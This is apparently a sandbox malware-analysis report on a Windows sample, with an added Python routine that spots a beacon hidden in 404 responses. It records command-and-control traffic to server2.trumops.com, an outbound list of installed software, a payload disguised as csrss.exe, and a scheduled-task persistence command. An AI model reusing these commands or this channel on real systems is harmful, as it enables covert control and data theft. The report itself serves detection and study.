                                                                                                  2021-11-04 12:13:06 UTC16OUTData Raw: 20 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 32 30 31 36 20 28 4b 42 34 34 38 34 32 31 34 29 20 33 32 2d 42 69 74 20 45 64 69 74 69 6f 6e 22 2c 22 64 69 73 70 6c 61 79 5f 76 65 72 73 69 6f 6e 22 3a 22 22 2c 22 69 6e 73 74 61 6c 6c 5f 64 61 74 65 22 3a 22 22 7d 2c 7b 22 64 69 73 70 6c 61 79 5f 6e 61 6d 65 22 3a 22 55 70 64 61 74 65 20 66 6f 72 20 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 32 30 31 36 20 28 4b 42 34 34 38 34 32 34 38 29 20 33 32 2d 42 69 74 20 45 64 69 74 69 6f 6e 22 2c 22 64 69 73 70 6c 61 79 5f 76 65 72 73 69 6f 6e 22 3a 22 22 2c 22 69 6e 73 74 61 6c 6c 5f 64 61 74 65 22 3a 22 22 7d 2c 7b 22 64 69 73 70 6c 61 79 5f 6e 61 6d 65 22 3a 22 4d 69 63 72 6f 73 6f 66 74 20 56 69 73 75 61 6c 20 43 2b 2b 20 32 30 31 33 20 78 38 36
                                                                                                  Data Ascii: Microsoft Office 2016 (KB4484214) 32-Bit Edition","display_version":"","install_date":""},{"display_name":"Update for Microsoft Office 2016 (KB4484248) 32-Bit Edition","display_version":"","install_date":""},{"display_name":"Microsoft Visual C++ 2013 x86
                                                                                                  2021-11-04 12:13:06 UTC20OUTData Raw: 22 69 6e 73 74 61 6c 6c 5f 64 61 74 65 22 3a 22 22 7d 2c 7b 22 64 69 73 70 6c 61 79 5f 6e 61 6d 65 22 3a 22 55 70 64 61 74 65 20 66 6f 72 20 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 20 66 6f 72 20 42 75 73 69 6e 65 73 73 20 28 4b 42 34 30 32 32 32 31 39 29 20 33 32 2d 42 69 74 20 45 64 69 74 69 6f 6e 22 2c 22 64 69 73 70 6c 61 79 5f 76 65 72 73 69 6f 6e 22 3a 22 22 2c 22 69 6e 73 74 61 6c 6c 5f 64 61 74 65 22 3a 22 22 7d 2c 7b 22 64 69 73 70 6c 61 79 5f 6e 61 6d 65 22 3a 22 53 65 63 75 72 69 74 79 20 55 70 64 61 74 65 20 66 6f 72 20 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 32 30 31 36 20 28 4b 42 33 30 38 35 35 33 38 29 20 33 32 2d 42 69 74 20 45 64 69 74 69 6f 6e 22 2c 22 64 69 73 70 6c 61 79 5f 76 65 72 73 69 6f 6e 22 3a 22 22 2c
                                                                                                  Data Ascii: "install_date":""},{"display_name":"Update for Microsoft OneDrive for Business (KB4022219) 32-Bit Edition","display_version":"","install_date":""},{"display_name":"Security Update for Microsoft Office 2016 (KB3085538) 32-Bit Edition","display_version":"",
                                                                                                  2021-11-04 12:13:06 UTC24OUTData Raw: 32 33 22 7d 2c 7b 22 64 69 73 70 6c 61 79 5f 6e 61 6d 65 22 3a 22 55 70 64 61 74 65 20 66 6f 72 20 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 32 30 31 36 20 28 4b 42 34 34 36 34 35 33 38 29 20 33 32 2d 42 69 74 20 45 64 69 74 69 6f 6e 22 2c 22 64 69 73 70 6c 61 79 5f 76 65 72 73 69 6f 6e 22 3a 22 22 2c 22 69 6e 73 74 61 6c 6c 5f 64 61 74 65 22 3a 22 22 7d 2c 7b 22 64 69 73 70 6c 61 79 5f 6e 61 6d 65 22 3a 22 46 6f 6e 74 63 6f 72 65 22 2c 22 64 69 73 70 6c 61 79 5f 76 65 72 73 69 6f 6e 22 3a 22 22 2c 22 69 6e 73 74 61 6c 6c 5f 64 61 74 65 22 3a 22 22 7d 2c 7b 22 64 69 73 70 6c 61 79 5f 6e 61 6d 65 22 3a 22 55 70 64 61 74 65 20 66 6f 72 20 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 32 30 31 36 20 28 4b 42 34 30 33 32 32 33 36 29 20 33 32 2d
                                                                                                  Data Ascii: 23"},{"display_name":"Update for Microsoft Office 2016 (KB4464538) 32-Bit Edition","display_version":"","install_date":""},{"display_name":"Fontcore","display_version":"","install_date":""},{"display_name":"Update for Microsoft Office 2016 (KB4032236) 32-
                                                                                                  2021-11-04 12:13:06 UTC27INHTTP/1.1 404 Not Found
                                                                                                  Date: Thu, 04 Nov 2021 12:13:06 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  x-powered-by: PHP/8.0.11
                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                  Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=4Ub0PA9Fmqq7OZHOTnOGcBRJwBnYj5ryxvyzrx6FOHxWcZzcHyVWiVfUPaGejltXTD%2F6SRqhh%2Br%2FCIFY9JbyleDFHvMUOkdoo5Awj3PJCVy9rH9NMnIkhsde%2BuCf1%2BDnWMfdu2Yl"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 6a8dc126190b7037-FRA
                                                                                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                                  2021-11-04 12:13:06 UTC27INData Raw: 34 61 38 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f 75 6e 64 20 28 23 34 30 34 29 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 39 70 74 20 22 56 65 72 64 61 6e 61 22 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20
                                                                                                  Data Ascii: 4a8<!DOCTYPE html><html><head> <meta charset="utf-8" /> <title>Not Found (#404)</title> <style> body { font: normal 9pt "Verdana"; color: #000; background: #fff; } h1 {
                                                                                                  2021-11-04 12:13:06 UTC28INData Raw: 70 74 20 22 56 65 72 64 61 6e 61 22 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 30 30 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 20 20 2e 76 65 72 73 69 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 67 72 61 79 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 38 70 74 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 61 61 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 74 6f 70 3a 20 31 65 6d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 65 6d 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a
                                                                                                  Data Ascii: pt "Verdana"; color: #000; } .version { color: gray; font-size: 8pt; border-top: 1px solid #aaa; padding-top: 1em; margin-bottom: 1em; } </style></head>
                                                                                                  2021-11-04 12:13:06 UTC | 29 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                  Data Ascii: 0


                                                                                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                                                                  9 | 192.168.2.3 | 49761 | 172.67.139.144 | 443 | C:\Users\user\Desktop\0NlSa5bf55.exe
                                                                                                  Timestamp | kBytes transferred | Direction | Data
                                                                                                  2021-11-04 12:13:15 UTC | 29 | OUT | POST /api/poll HTTP/1.1
                                                                                                  Host: server2.trumops.com
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:73.0) Gecko/20100101 Firefox/73.0
                                                                                                  Content-Length: 640
                                                                                                  Accept-Encoding: gzip
                                                                                                  2021-11-04 12:13:15 UTC | 29 | OUT | Data Raw: 44 7a 4f 47 6d 43 49 6c 42 47 33 62 76 75 48 64 6c 2f 39 38 77 50 59 51 36 72 65 73 64 63 6a 37 39 39 34 5a 4f 43 56 44 39 42 6c 72 4c 67 57 54 7a 6e 55 78 48 47 49 47 65 43 49 67 34 68 35 51 4c 67 48 7a 75 7a 32 73 57 63 36 72 2b 69 71 4a 6e 7a 68 34 41 48 76 34 78 6d 73 2f 37 66 58 71 6d 44 74 79 6b 78 31 47 6a 4b 79 45 4f 35 73 37 45 62 59 58 34 57 62 78 55 39 62 56 7a 6f 65 44 51 71 59 4b 48 37 6d 64 43 6b 47 31 6d 47 57 54 43 49 36 49 70 6e 39 78 53 6f 65 6a 39 6b 68 2f 72 55 66 35 55 50 47 70 56 78 32 50 70 62 63 73 4d 4b 61 42 44 30 4c 76 59 4a 66 65 7a 6f 59 52 35 30 45 2b 6f 33 59 32 42 41 2f 58 6f 43 6c 51 6c 50 73 4f 39 79 67 46 51 38 72 39 71 43 33 70 33 46 5a 46 48 62 4a 37 62 36 61 7a 6b 6b 39 48 78 69 46 77 59 61 4e 62 53 6b 5a 38 4c 31 79
                                                                                                  Data Ascii: DzOGmCIlBG3bvuHdl/98wPYQ6resdcj7994ZOCVD9BlrLgWTznUxHGIGeCIg4h5QLgHzuz2sWc6r+iqJnzh4AHv4xms/7fXqmDtykx1GjKyEO5s7EbYX4WbxU9bVzoeDQqYKH7mdCkG1mGWTCI6Ipn9xSoej9kh/rUf5UPGpVx2PpbcsMKaBD0LvYJfezoYR50E+o3Y2BA/XoClQlPsO9ygFQ8r9qC3p3FZFHbJ7b6azkk9HxiFwYaNbSkZ8L1y
                                                                                                  2021-11-04 12:13:15 UTC | 29 | IN | HTTP/1.1 404 Not Found
                                                                                                  Date: Thu, 04 Nov 2021 12:13:15 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  x-powered-by: PHP/8.0.11
                                                                                                  set-cookie: PHPSESSID=jp6rg8da1hqqg23tjramjvmq4d; path=/; HttpOnly
                                                                                                  expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                  cache-control: no-store, no-cache, must-revalidate
                                                                                                  pragma: no-cache
                                                                                                  access-control-allow-credentials: false
                                                                                                  CF-Cache-Status: DYNAMIC
                                                                                                  Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=VULNO5Jg3NJ174F0kG6Gst68KUn7qITHMZj2A7IY4Nz0a1rfozYrXWuoYRMg%2FxRYwvjKeu5aorLZfTsqKFJnH5%2B410dszzmqHyXdOL7bIrl%2BSVbGW2OHUGkkeU93qYeHI6CXQle4"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 6a8dc15e7c2f774a-LHR
                                                                                                  alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                                  2021-11-04 12:13:15 UTC | 30 | IN | Data Raw: 65 38 0d 0a 78 53 78 67 2f 62 66 6c 51 4a 71 62 2b 47 6c 36 45 72 4b 38 45 4c 4e 61 48 7a 6b 4d 77 67 43 4e 4b 67 53 61 69 4f 63 68 41 78 73 6a 67 2b 4d 59 45 58 63 45 6b 54 2f 49 6e 36 69 2f 4f 48 38 73 35 71 66 4a 48 2f 30 6d 56 33 43 50 62 7a 72 4b 4a 76 4b 55 45 4f 31 54 34 73 78 75 46 41 57 42 6f 2f 49 61 70 50 63 70 70 31 6e 37 71 55 63 64 6c 69 34 79 70 4d 4f 59 34 4d 42 76 63 58 38 2b 50 6a 38 4c 39 48 67 7a 43 38 54 6c 70 59 50 4a 72 2b 4c 33 77 61 37 37 45 61 63 55 75 6f 4b 7a 4a 38 68 61 75 33 4f 71 66 4f 6c 37 4e 72 57 7a 36 6e 45 6d 5a 72 35 38 4a 58 57 51 31 39 36 64 50 6c 34 6a 53 39 52 7a 7a 4a 47 39 32 74 69 34 4e 71 43 2b 45 4a 71 57 31 45 72 61 65 70 54 52 52 79 76 53 55 67 3d 3d 0d 0a
                                                                                                  Data Ascii: e8xSxg/bflQJqb+Gl6ErK8ELNaHzkMwgCNKgSaiOchAxsjg+MYEXcEkT/In6i/OH8s5qfJH/0mV3CPbzrKJvKUEO1T4sxuFAWBo/IapPcpp1n7qUcdli4ypMOY4MBvcX8+Pj8L9HgzC8TlpYPJr+L3wa77EacUuoKzJ8hau3OqfOl7NrWz6nEmZr58JXWQ196dPl4jS9RzzJG92ti4NqC+EJqW1EraepTRRyvSUg==
                                                                                                  2021-11-04 12:13:15 UTC | 31 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                  Data Ascii: 0
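
The 12:13:15 UTC exchange above is the one worth reading closely. The sample POSTs an opaque 640-byte body to /api/poll on server2.trumops.com (fronted by Cloudflare), and the server answers 404 Not Found, yet the chunked body of that 404 is a single 0xe8 = 232-byte base64 string, not the HTML "Not Found (#404)" page the same host returned at 12:13:06 UTC. An HTTP status code is not a content check: a 404 with a non-HTML body is exactly the kind of beacon/tasking channel that blends into error traffic. The Python below is an added example, not code from the sandbox or the sample. It dechunks a captured HTTP/1.1 response, classifies the body, and reports the decoded size of a base64 blob. RESPONSE_POLL is rebuilt from the hex dump above (the chunk is byte-exact; only the headers that affect parsing are kept); the HTML reply is a constructed stand-in for the genuine error page.

```python
"""Dechunk a captured HTTP/1.1 response and flag a 404 whose body is not a page.

Added example for this report; not code from the sandbox or the sample.
RESPONSE_POLL is rebuilt from the hex dump of the 12:13:15 UTC /api/poll reply
(status line plus the headers that matter; the 0xe8 chunk is byte-exact).
RESPONSE_PAGE is constructed to stand in for the Yii-style error page.
"""
import base64
import re


def parse_response(raw: bytes):
    """Return (status code, lower-cased header dict, raw body bytes)."""
    head, sep, body = raw.partition(b"\r\n\r\n")
    if not sep:
        raise ValueError("no end of headers")
    lines = head.split(b"\r\n")
    status = int(lines[0].split()[1])
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(b":")
        headers[name.strip().lower().decode("latin-1")] = value.strip().decode("latin-1")
    return status, headers, body


def dechunk(body: bytes) -> bytes:
    """Reassemble a Transfer-Encoding: chunked body; reject truncated or malformed chunks."""
    out = bytearray()
    pos = 0
    while True:
        eol = body.find(b"\r\n", pos)
        if eol < 0:
            raise ValueError("missing chunk-size line")
        size = int(body[pos:eol].split(b";")[0], 16)  # drop chunk extensions
        pos = eol + 2
        if size == 0:
            return bytes(out)  # trailers, if any, are ignored
        chunk = body[pos:pos + size]
        if len(chunk) != size or body[pos + size:pos + size + 2] != b"\r\n":
            raise ValueError("truncated or malformed chunk")
        out += chunk
        pos += size + 2


_B64 = re.compile(rb"[A-Za-z0-9+/]+={0,2}")


def classify_body(payload: bytes) -> str:
    """'html' for an error page, 'opaque-base64' for a bare base64 blob, else 'other'."""
    text = payload.strip()
    if text.startswith(b"<") or b"<html" in text.lower():
        return "html"
    if len(text) % 4 == 0 and _B64.fullmatch(text):
        return "opaque-base64"
    return "other"


def analyze(raw: bytes) -> dict:
    """Summarise one captured response; decoded_len is set only for a base64 body."""
    status, headers, body = parse_response(raw)
    if "chunked" in headers.get("transfer-encoding", "").lower():
        body = dechunk(body)
    kind = classify_body(body)
    result = {"status": status, "kind": kind, "body_len": len(body), "decoded_len": None}
    if kind == "opaque-base64":
        result["decoded_len"] = len(base64.b64decode(body.strip()))
    return result


def chunked(*pieces: bytes) -> bytes:
    """Build a chunked body from pieces (used here to construct a test response)."""
    return b"".join(b"%x\r\n%s\r\n" % (len(p), p) for p in pieces) + b"0\r\n\r\n"


HEAD_404 = (b"HTTP/1.1 404 Not Found\r\n"
            b"Content-Type: text/html; charset=UTF-8\r\n"
            b"Transfer-Encoding: chunked\r\n"
            b"Connection: close\r\n\r\n")

# Byte-exact chunk from the captured reply: size 0xe8 (232), base64 text, terminator.
RESPONSE_POLL = HEAD_404 + (
    b"e8\r\n"
    b"xSxg/bflQJqb+Gl6ErK8ELNaHzkMwgCNKgSaiOchAxsjg+MYEXcEkT/In6i/OH8s5qfJH/0mV3CPbzrK"
    b"JvKUEO1T4sxuFAWBo/IapPcpp1n7qUcdli4ypMOY4MBvcX8+Pj8L9HgzC8TlpYPJr+L3wa77EacUuoKz"
    b"J8hau3OqfOl7NrWz6nEmZr58JXWQ196dPl4jS9RzzJG92ti4NqC+EJqW1EraepTRRyvSUg==\r\n"
    b"0\r\n\r\n")

# Constructed stand-in for the genuine error page returned a few seconds earlier.
RESPONSE_PAGE = HEAD_404 + chunked(
    b"<!DOCTYPE html>\n<html>\n<head>\n<title>Not Found (#404)</title>\n",
    b"</head>\n<body>Page not found.</body>\n</html>\n")

if __name__ == "__main__":
    for name, raw in (("api/poll", RESPONSE_POLL), ("error page", RESPONSE_PAGE)):
        print(name, analyze(raw))
```

Run against the captured bytes, analyze() reports status 404, kind opaque-base64 and a 172-byte decoded payload; the constructed error page comes back as kind html. The dechunker is strict on purpose: a chunk whose declared size does not match the bytes present, or that lacks its trailing CRLF, raises rather than silently yielding a partial body, which matters when the capture itself may be truncated (the request body at 12:13:15 UTC is 640 bytes by Content-Length but only a prefix is shown).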


                                                                                                  Code Manipulations

                                                                                                  Statistics

                                                                                                  Behavior

                                                                                                  System Behavior

                                                                                                  General

                                                                                                  Start time:13:12:34
                                                                                                  Start date:04/11/2021
                                                                                                  Path:C:\Users\user\Desktop\0NlSa5bf55.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Users\user\Desktop\0NlSa5bf55.exe"
                                                                                                  Imagebase:0x400000
                                                                                                  File size:2095616 bytes
                                                                                                  MD5 hash:EE30D6928C9DE84049AA055417CC767E
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:low

                                                                                                  General

                                                                                                  Start time:13:12:35
                                                                                                  Start date:04/11/2021
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff7f20f0000
                                                                                                  File size:625664 bytes
                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high

                                                                                                  General

                                                                                                  Start time:13:12:39
                                                                                                  Start date:04/11/2021
                                                                                                  Path:C:\Users\user\Desktop\upd.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:C:\Users\user\Desktop\upd.exe -update
                                                                                                  Imagebase:0x400000
                                                                                                  File size:3788288 bytes
                                                                                                  MD5 hash:3C3046F640F7825C720849AAA809C963
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000005.00000002.319820615.0000000000401000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                  Antivirus matches:
                                                                                                  • Detection: 100%, Avira
                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                  • Detection: 31%, Metadefender
                                                                                                  • Detection: 86%, ReversingLabs
                                                                                                  Reputation:low

                                                                                                  General

                                                                                                  Start time:13:12:44
                                                                                                  Start date:04/11/2021
                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                  Imagebase:0x7ff70d6e0000
                                                                                                  File size:51288 bytes
                                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high

                                                                                                  General

                                                                                                  Start time:13:12:45
                                                                                                  Start date:04/11/2021
                                                                                                  Path:C:\Windows\servicing\TrustedInstaller.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\servicing\TrustedInstaller.exe
                                                                                                  Imagebase:0x7ff635d90000
                                                                                                  File size:131584 bytes
                                                                                                  MD5 hash:4578046C54A954C917BB393B70BA0AEB
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:moderate

                                                                                                  General

                                                                                                  Start time:13:12:46
                                                                                                  Start date:04/11/2021
                                                                                                  Path:C:\Users\user\Desktop\upd.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:"C:\Users\user\Desktop\upd.exe" -update
                                                                                                  Imagebase:0x400000
                                                                                                  File size:3788288 bytes
                                                                                                  MD5 hash:3C3046F640F7825C720849AAA809C963
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 00000008.00000002.347779189.0000000000401000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                  Reputation:low

                                                                                                  General

                                                                                                  Start time:13:12:54
                                                                                                  Start date:04/11/2021
                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                  Imagebase:0x7ff70d6e0000
                                                                                                  File size:51288 bytes
                                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high

                                                                                                  General

                                                                                                  Start time:13:12:57
                                                                                                  Start date:04/11/2021
                                                                                                  Path:C:\Windows\rss\csrss.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:C:\Windows\rss\csrss.exe -cleanup C:\Users\user\Desktop\upd.exe
                                                                                                  Imagebase:0x400000
                                                                                                  File size:3788288 bytes
                                                                                                  MD5 hash:3C3046F640F7825C720849AAA809C963
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Yara matches:
                                                                                                  • Rule: JoeSecurity_MetasploitPayload_3, Description: Yara detected Metasploit Payload, Source: 0000000B.00000002.561114927.0000000000401000.00000040.00020000.sdmp, Author: Joe Security
                                                                                                  Antivirus matches:
                                                                                                  • Detection: 100%, Avira
                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                  • Detection: 31%, Metadefender
                                                                                                  • Detection: 86%, ReversingLabs
                                                                                                  Reputation:low

                                                                                                  General

                                                                                                  Start time:13:13:06
                                                                                                  Start date:04/11/2021
                                                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                                                                                                  Imagebase:0x7ff646d20000
                                                                                                  File size:226816 bytes
                                                                                                  MD5 hash:838D346D1D28F00783B7A6C6BD03A0DA
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language
                                                                                                  Reputation:high

                                                                                                  General

                                                                                                  Start time:13:13:06
                                                                                                  Start date:04/11/2021
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff7f20f0000
                                                                                                  File size:625664 bytes
                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language

                                                                                                  General

                                                                                                  Start time:13:13:06
                                                                                                  Start date:04/11/2021
                                                                                                  Path:C:\Windows\System32\schtasks.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:schtasks /delete /tn ScheduledUpdate /f
                                                                                                  Imagebase:0x7ff646d20000
                                                                                                  File size:226816 bytes
                                                                                                  MD5 hash:838D346D1D28F00783B7A6C6BD03A0DA
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language

                                                                                                  General

                                                                                                  Start time:13:13:07
                                                                                                  Start date:04/11/2021
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff7f20f0000
                                                                                                  File size:625664 bytes
                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language

                                                                                                  General

                                                                                                  Start time:13:13:07
                                                                                                  Start date:04/11/2021
                                                                                                  Path:C:\Windows\SysWOW64\mountvol.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:mountvol B: /s
                                                                                                  Imagebase:0x1a0000
                                                                                                  File size:15360 bytes
                                                                                                  MD5 hash:5C11B99E6D41403031CD946255E8A353
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language

                                                                                                  General

                                                                                                  Start time:13:13:09
                                                                                                  Start date:04/11/2021
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff7f20f0000
                                                                                                  File size:625664 bytes
                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language

                                                                                                  General

                                                                                                  Start time:13:13:09
                                                                                                  Start date:04/11/2021
                                                                                                  Path:C:\Windows\SysWOW64\mountvol.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:mountvol B: /d
                                                                                                  Imagebase:0x1a0000
                                                                                                  File size:15360 bytes
                                                                                                  MD5 hash:5C11B99E6D41403031CD946255E8A353
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language

                                                                                                  General

                                                                                                  Start time:13:13:15
                                                                                                  Start date:04/11/2021
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  Imagebase:0x7ff7f20f0000
                                                                                                  File size:625664 bytes
                                                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language

                                                                                                  General

                                                                                                  Start time:13:13:15
                                                                                                  Start date:04/11/2021
                                                                                                  Path:C:\Windows\System32\svchost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                  Imagebase:0x7ff70d6e0000
                                                                                                  File size:51288 bytes
                                                                                                  MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language

                                                                                                  General

                                                                                                  Start time:13:13:15
                                                                                                  Start date:04/11/2021
                                                                                                  Path:C:\Windows\SysWOW64\mountvol.exe
                                                                                                  Wow64 process (32bit):true
                                                                                                  Commandline:mountvol B: /s
                                                                                                  Imagebase:0x1a0000
                                                                                                  File size:15360 bytes
                                                                                                  MD5 hash:5C11B99E6D41403031CD946255E8A353
                                                                                                  Has elevated privileges:true
                                                                                                  Has administrator privileges:true
                                                                                                  Programmed in:C, C++ or other language

                                                                                                  General

                                                                                                  Start time:13:13:16
                                                                                                  Start date:04/11/2021
                                                                                                  Path:C:\Windows\System32\conhost.exe
                                                                                                  Wow64 process (32bit):false
                                                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
